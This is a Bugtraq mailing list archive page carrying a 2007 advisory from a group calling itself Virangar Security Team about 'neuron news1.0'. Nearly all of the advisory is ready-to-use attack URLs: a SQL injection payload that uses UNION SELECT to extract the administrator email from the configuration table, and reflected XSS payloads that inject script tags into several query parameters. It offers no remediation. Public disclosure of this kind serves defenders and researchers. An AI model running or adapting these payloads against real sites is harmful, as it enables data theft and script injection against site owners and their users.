Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
From: hadihadi_zedehal_2006 () yahoo com
Date: 16 Dec 2007 23:13:42 -0000
           
   ####################################################################
   #                                                                  #
   #  ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::....  #
   #                        (sql injection/xss)                       #           
   ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi & black.shadowes)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vlues:

1.sql injection:
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*
########################
2.xss:
http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script>
########################
g00d l0uck

  By Date           By Thread  

Current thread:
  • neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss) hadihadi_zedehal_2006 (Dec 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]